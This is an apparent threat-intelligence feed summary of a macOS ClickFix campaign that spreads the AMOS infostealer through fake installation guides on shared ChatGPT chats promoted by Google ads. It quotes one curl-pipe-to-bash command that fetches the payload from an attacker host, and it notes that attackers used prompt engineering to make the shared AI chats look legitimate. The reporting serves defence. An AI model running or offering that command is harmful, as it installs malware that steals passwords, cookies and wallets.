logo

New ClickFix Attacks as macOS Infostealer Leverages Official ChatGPT Website by Piggybacking

ID: 3372ccf1-a07c-5856-9d1d-25c4d96df1f2

STIX ID: report--3372ccf1-a07c-5856-9d1d-25c4d96df1f2

Feed Name: cybersecurityNews.com

Threat Score
72/100

Date Published: 2025-12-11

Date Updated: 2026-04-21

Author: Tushar Subhra Dutta

...
...

A threat actor is using paid Google ads and ChatGPT's public chat-sharing feature to publish convincing fake installation guides on chatgpt.com that instruct macOS users to run a shell command (e.g. /bin/bash -c "$(curl -fsSL 'https://atlas-extension.com/gt')") which downloads and installs the AMOS infostealer; AMOS steals passwords, cookies, browser data, cryptocurrency wallet information, collects documents and installs a persistent backdoor. Kaspersky analysis found attackers used prompt engineering and chat history cleanup to make the shared chats appear legitimate.

Your team is not currently subscribed to this feed. You must subscribe to it in order to see this post.